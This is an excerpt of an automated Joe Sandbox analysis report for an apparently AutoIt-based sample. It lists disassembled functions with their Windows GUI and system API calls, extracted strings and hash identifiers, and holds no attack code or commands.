                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                              • String ID:
                              • API String ID: 4124339563-0
                              • Opcode ID: 4d0e7e004eadc7b690be5b3974175031173f80bb9a639a60b93a3a62a9cbd7f5
                              • Instruction ID: c996092c723037b3dc574acaf8a655a9678b27f0c02ca595663e6c206cb32e44
                              • Opcode Fuzzy Hash: 4d0e7e004eadc7b690be5b3974175031173f80bb9a639a60b93a3a62a9cbd7f5
                              • Instruction Fuzzy Hash: 74A1AE7211C301EFDB209F64DC08E6B7BA9FF89321F104A29F962961E0D735DA44DB92
                              Function 00882C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(?,?,?), ref: 00882CA2
                              • DeleteObject.GDI32(00000000), ref: 00882CE8
                              • DeleteObject.GDI32(00000000), ref: 00882CF3
                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00882CFE
                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00882D09
                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 008BC68B
                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008BC6C4
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008BCAED
                                • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00882036,?,00000000,?,?,?,?,008816CB,00000000,?), ref: 00881B9A
                              • SendMessageW.USER32(?,00001053), ref: 008BCB2A
                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BCB41
                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008BCB57
                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008BCB62
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                              • String ID: 0
                              • API String ID: 464785882-4108050209
                              • Opcode ID: 1852af9e80f668846ca687dc8d73af92ee20914f439d55278ddf8d62829dc71f
                              • Instruction ID: 6a55959ed9f830acb15a4fe41b90247174fac8b3b47dbaa6cf021b07b75591aa
                              • Opcode Fuzzy Hash: 1852af9e80f668846ca687dc8d73af92ee20914f439d55278ddf8d62829dc71f
                              • Instruction Fuzzy Hash: AD12AC70604205EFDB20DF28C984BA9BBE2FF05314F5445B9F896DB662CB31E842DB91
                              Function 008F77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(00000000), ref: 008F77F1
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008F78B0
                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008F78EE
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008F7900
                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008F7946
                              • GetClientRect.USER32(00000000,?), ref: 008F7952
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008F7996
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008F79A5
                              • GetStockObject.GDI32(00000011), ref: 008F79B5
                              • SelectObject.GDI32(00000000,00000000), ref: 008F79B9
                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008F79C9
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008F79D2
                              • DeleteDC.GDI32(00000000), ref: 008F79DB
                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008F7A07
                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 008F7A1E
                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008F7A59
                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008F7A6D
                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 008F7A7E
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008F7AAE
                              • GetStockObject.GDI32(00000011), ref: 008F7AB9
                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008F7AC4
                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008F7ACE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                              • API String ID: 2910397461-517079104
                              • Opcode ID: dd336d9c5d5bb04dc66ffdd7c8bbc9eab3c1b5c3cd912df9edd68efa83d5ee62
                              • Instruction ID: a9d56edcc0130b3b86231aa5572c322baf9e53d0eff25485d32c787663e28f13
                              • Opcode Fuzzy Hash: dd336d9c5d5bb04dc66ffdd7c8bbc9eab3c1b5c3cd912df9edd68efa83d5ee62
                              • Instruction Fuzzy Hash: 0FA17EB1A54209BFEB14DBA8DC4AFAA7BB9FB45710F004114FA15E72E0D7B0AD00DB65
                              Function 008EAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 008EAF89
                              • GetDriveTypeW.KERNEL32(?,0090FAC0,?,\\.\,0090F910), ref: 008EB066
                              • SetErrorMode.KERNEL32(00000000,0090FAC0,?,\\.\,0090F910), ref: 008EB1C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorMode$DriveType
                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                              • API String ID: 2907320926-4222207086
                              • Opcode ID: a418c5b03f74575e970b3c9367bbc06ba763770165bba2f6221521985b673305
                              • Instruction ID: b7bec85f668f0bce819747a6608378c5a09b1f86e767d0bffd133f29151024a1
                              • Opcode Fuzzy Hash: a418c5b03f74575e970b3c9367bbc06ba763770165bba2f6221521985b673305
                              • Instruction Fuzzy Hash: AA51C230A84389EBCB14EB16C9A287E73B1FB96769B204025E44BE7290C735AD41DF43
                              Function 00886A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                              • API String ID: 1038674560-86951937
                              • Opcode ID: 0401924f200ab29ac87e5d0c41c397bbef11200ba7a30291ef53affe0cf1c106
                              • Instruction ID: a3bbd80fca14e279a4fc3de3e608b1aba6a146fb290b65fdfbe311f25a2e1454
                              • Opcode Fuzzy Hash: 0401924f200ab29ac87e5d0c41c397bbef11200ba7a30291ef53affe0cf1c106
                              • Instruction Fuzzy Hash: 3F812671640625AFDB24BB68CC82FEE3768FF16704F044025F945EA5C2FB60EA61C792
                              Function 0090AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetSysColor.USER32(00000012), ref: 0090AB99
                              • SetTextColor.GDI32(?,?), ref: 0090AB9D
                              • GetSysColorBrush.USER32(0000000F), ref: 0090ABB3
                              • GetSysColor.USER32(0000000F), ref: 0090ABBE
                              • CreateSolidBrush.GDI32(?), ref: 0090ABC3
                              • GetSysColor.USER32(00000011), ref: 0090ABDB
                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090ABE9
                              • SelectObject.GDI32(?,00000000), ref: 0090ABFA
                              • SetBkColor.GDI32(?,00000000), ref: 0090AC03
                              • SelectObject.GDI32(?,?), ref: 0090AC10
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0090AC2F
                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090AC46
                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0090AC5B
                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0090ACA7
                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0090ACCE
                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0090ACEC
                              • DrawFocusRect.USER32(?,?), ref: 0090ACF7
                              • GetSysColor.USER32(00000011), ref: 0090AD05
                              • SetTextColor.GDI32(?,00000000), ref: 0090AD0D
                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0090AD21
                              • SelectObject.GDI32(?,0090A869), ref: 0090AD38
                              • DeleteObject.GDI32(?), ref: 0090AD43
                              • SelectObject.GDI32(?,?), ref: 0090AD49
                              • DeleteObject.GDI32(?), ref: 0090AD4E
                              • SetTextColor.GDI32(?,?), ref: 0090AD54
                              • SetBkColor.GDI32(?,?), ref: 0090AD5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                              • String ID:
                              • API String ID: 1996641542-0
                              • Opcode ID: 975ddcfbf92b54ebb11db7a843ffa0002435c2f89e53bcdaae0e801bb36901f5
                              • Instruction ID: 02a87acc70f62f18426c1a9d3d9d880ca111ebee45f6c46f48de80e0c9cd9a0f
                              • Opcode Fuzzy Hash: 975ddcfbf92b54ebb11db7a843ffa0002435c2f89e53bcdaae0e801bb36901f5
                              • Instruction Fuzzy Hash: E3615D71904218EFDF219FA8DC48EAE7BB9EF08320F114525F915AB2E1D6759A40EB90
                              Function 00908C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00908D34
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908D45
                              • CharNextW.USER32(0000014E), ref: 00908D74
                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00908DB5
                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00908DCB
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908DDC
                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00908DF9
                              • SetWindowTextW.USER32(?,0000014E), ref: 00908E45
                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00908E5B
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00908E8C
                              • _memset.LIBCMT ref: 00908EB1
                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00908EFA
                              • _memset.LIBCMT ref: 00908F59
                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00908F83
                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00908FDB
                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00909088
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 009090AA
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009090F4
                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00909121
                              • DrawMenuBar.USER32(?), ref: 00909130
                              • SetWindowTextW.USER32(?,0000014E), ref: 00909158
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                              • String ID: 0
                              • API String ID: 1073566785-4108050209
                              • Opcode ID: 67250fd3747298cd9b47a4b65f51280d1cc45c6d88f8831fea2e31c015f3ef65
                              • Instruction ID: b2e9ae9ef2b3d0023e8aca059dc1e97f2696649d9b3f1b09a43617cb080eeded
                              • Opcode Fuzzy Hash: 67250fd3747298cd9b47a4b65f51280d1cc45c6d88f8831fea2e31c015f3ef65
                              • Instruction Fuzzy Hash: E0E1AD71A04219AEDF209F64CC88EEF7BB9FF05710F008259F955AA2D1DB748A81DF61
                              Function 00904B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetCursorPos.USER32(?), ref: 00904C51
                              • GetDesktopWindow.USER32 ref: 00904C66
                              • GetWindowRect.USER32(00000000), ref: 00904C6D
                              • GetWindowLongW.USER32(?,000000F0), ref: 00904CCF
                              • DestroyWindow.USER32(?), ref: 00904CFB
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00904D24
                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00904D42
                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00904D68
                              • SendMessageW.USER32(?,00000421,?,?), ref: 00904D7D
                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00904D90
                              • IsWindowVisible.USER32(?), ref: 00904DB0
                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00904DCB
                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00904DDF
                              • GetWindowRect.USER32(?,?), ref: 00904DF7
                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00904E1D
                              • GetMonitorInfoW.USER32(00000000,?), ref: 00904E37
                              • CopyRect.USER32(?,?), ref: 00904E4E
                              • SendMessageW.USER32(?,00000412,00000000), ref: 00904EB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                              • String ID: ($0$tooltips_class32
                              • API String ID: 698492251-4156429822
                              • Opcode ID: 0d6e6aaf2b4b7e402501b3f8557e43b9e1078bf73cfe4ba488d6e5e783f7e6a0
                              • Instruction ID: ecc72c6dcd6cf85c512f67002a89b7531200fd950c0c56eb3c34ed51c2b5c3d2
                              • Opcode Fuzzy Hash: 0d6e6aaf2b4b7e402501b3f8557e43b9e1078bf73cfe4ba488d6e5e783f7e6a0
                              • Instruction Fuzzy Hash: 0BB18CB1608341AFDB14DF28C944B6ABBE5FF84714F00891CF6999B2A1DB71ED05CB92
                              Function 008827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828BC
                              • GetSystemMetrics.USER32(00000007), ref: 008828C4
                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828EF
                              • GetSystemMetrics.USER32(00000008), ref: 008828F7
                              • GetSystemMetrics.USER32(00000004), ref: 0088291C
                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00882939
                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00882949
                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0088297C
                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00882990
                              • GetClientRect.USER32(00000000,000000FF), ref: 008829AE
                              • GetStockObject.GDI32(00000011), ref: 008829CA
                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008829D5
                                • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                              • SetTimer.USER32(00000000,00000000,00000028,00881256), ref: 008829FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                              • String ID: AutoIt v3 GUI
                              • API String ID: 1458621304-248962490
                              • Opcode ID: d8350f3bde4c4141a039560fc78bb3cc48480201f03d476da7fe703ea78a728c
                              • Instruction ID: 61d630acc803f640ddead317c8e8aa47f3b3ad750edc068a9a3079d88303e833
                              • Opcode Fuzzy Hash: d8350f3bde4c4141a039560fc78bb3cc48480201f03d476da7fe703ea78a728c
                              • Instruction Fuzzy Hash: 8AB18D71A0420AAFDB24EFA8DC55BEE7BB4FB08714F108129FA15E7390DB70A940DB51
                              Function 00904069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                              Download Yara Rule
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 009040F6
                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009041B6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharMessageSendUpper
                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                              • API String ID: 3974292440-719923060
                              • Opcode ID: 7b11811a66840e1fa680027bac051d8b98aecf3c106584f9e5679ef360bbbcec
                              • Instruction ID: d549074ab95933950d000a9aff0f9a340af5aa2d36d0cb01fe9245d51c6fe7cc
                              • Opcode Fuzzy Hash: 7b11811a66840e1fa680027bac051d8b98aecf3c106584f9e5679ef360bbbcec
                              • Instruction Fuzzy Hash: 37A18DB12143019FCB14EF28C992A6AB3E5FF84314F144969F9A69B7D2DB34EC05CB42
                              Function 008F52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                              Download Yara Rule
                              APIs
                              • LoadCursorW.USER32(00000000,00007F89), ref: 008F5309
                              • LoadCursorW.USER32(00000000,00007F8A), ref: 008F5314
                              • LoadCursorW.USER32(00000000,00007F00), ref: 008F531F
                              • LoadCursorW.USER32(00000000,00007F03), ref: 008F532A
                              • LoadCursorW.USER32(00000000,00007F8B), ref: 008F5335
                              • LoadCursorW.USER32(00000000,00007F01), ref: 008F5340
                              • LoadCursorW.USER32(00000000,00007F81), ref: 008F534B
                              • LoadCursorW.USER32(00000000,00007F88), ref: 008F5356
                              • LoadCursorW.USER32(00000000,00007F80), ref: 008F5361
                              • LoadCursorW.USER32(00000000,00007F86), ref: 008F536C
                              • LoadCursorW.USER32(00000000,00007F83), ref: 008F5377
                              • LoadCursorW.USER32(00000000,00007F85), ref: 008F5382
                              • LoadCursorW.USER32(00000000,00007F82), ref: 008F538D
                              • LoadCursorW.USER32(00000000,00007F84), ref: 008F5398
                              • LoadCursorW.USER32(00000000,00007F04), ref: 008F53A3
                              • LoadCursorW.USER32(00000000,00007F02), ref: 008F53AE
                              • GetCursorInfo.USER32(?), ref: 008F53BE
                              • GetLastError.KERNEL32(00000001,00000000), ref: 008F53E9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Cursor$Load$ErrorInfoLast
                              • String ID:
                              • API String ID: 3215588206-0
                              • Opcode ID: c5cbc4028dbc27e231685cb90fbe8f03f27514e7a45555bfc77d7aed2a4f8cf5
                              • Instruction ID: 6a7ece479e581dd502185d09175c62c427cc97311b1547367873f51e6ba31595
                              • Opcode Fuzzy Hash: c5cbc4028dbc27e231685cb90fbe8f03f27514e7a45555bfc77d7aed2a4f8cf5
                              • Instruction Fuzzy Hash: 97417670E043196ADB109FBA8C49C6EFFF8FF51750B10452FE609E7290DAB855008E65
                              Function 008DAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetClassNameW.USER32(?,?,00000100), ref: 008DAAA5
                              • __swprintf.LIBCMT ref: 008DAB46
                              • _wcscmp.LIBCMT ref: 008DAB59
                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008DABAE
                              • _wcscmp.LIBCMT ref: 008DABEA
                              • GetClassNameW.USER32(?,?,00000400), ref: 008DAC21
                              • GetDlgCtrlID.USER32(?), ref: 008DAC73
                              • GetWindowRect.USER32(?,?), ref: 008DACA9
                              • GetParent.USER32(?), ref: 008DACC7
                              • ScreenToClient.USER32(00000000), ref: 008DACCE
                              • GetClassNameW.USER32(?,?,00000100), ref: 008DAD48
                              • _wcscmp.LIBCMT ref: 008DAD5C
                              • GetWindowTextW.USER32(?,?,00000400), ref: 008DAD82
                              • _wcscmp.LIBCMT ref: 008DAD96
                                • Part of subcall function 008A386C: _iswctype.LIBCMT ref: 008A3874
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                              • String ID: %s%u
                              • API String ID: 3744389584-679674701
                              • Opcode ID: 37277c846da5005af0a98e643b26b9e62b540a83b39f783d7f991c61f070e49b
                              • Instruction ID: 9ef6675515b9d8fdc322a155b7a55c0cf451d7ceaf7be71554cb61821c79a467
                              • Opcode Fuzzy Hash: 37277c846da5005af0a98e643b26b9e62b540a83b39f783d7f991c61f070e49b
